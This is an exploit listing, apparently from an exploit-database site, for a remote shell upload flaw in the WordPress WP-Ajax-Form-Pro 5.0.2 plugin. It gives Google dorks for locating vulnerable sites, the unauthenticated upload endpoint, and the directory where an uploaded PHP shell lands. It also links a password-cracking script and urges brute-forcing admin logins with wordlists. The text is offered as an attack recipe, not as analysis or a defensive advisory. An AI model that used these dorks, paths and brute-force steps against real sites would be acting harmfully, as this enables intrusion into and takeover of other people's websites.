WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability

2019.01.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

>Exploit Title : WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability >Exploit Author: The Mechiavellian || "facebook.com/TheMachiavellian/" >Vendor Homepage || Software link : ajaxformpro.com >Software Price : 19$ - 89$ >Version : 5.0.2 >Google Dorks : - inurl:''/wp-content/plugins/wp-ajax-form-pro'' - intext:''AJAX Form Pro - All Rights Reserved'' >Admin Panel Login Path : http://website.com/wp-login.php [+] use my account dictionnary crack script : https://github.com/adem313/glory/blob/master/r.py - use wordpress wordlists to hack the admin panel >Arbitrary File Upload/Remote Shell Upload Exploit : /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp >Directory File Path : /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/uploads/YourShellhere.php [+] accept : .php - .gif - .jpg - .png - .html - .fla - .pdf exploit by Cyberizm Digital Security Team

References:

the Machiavellian


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top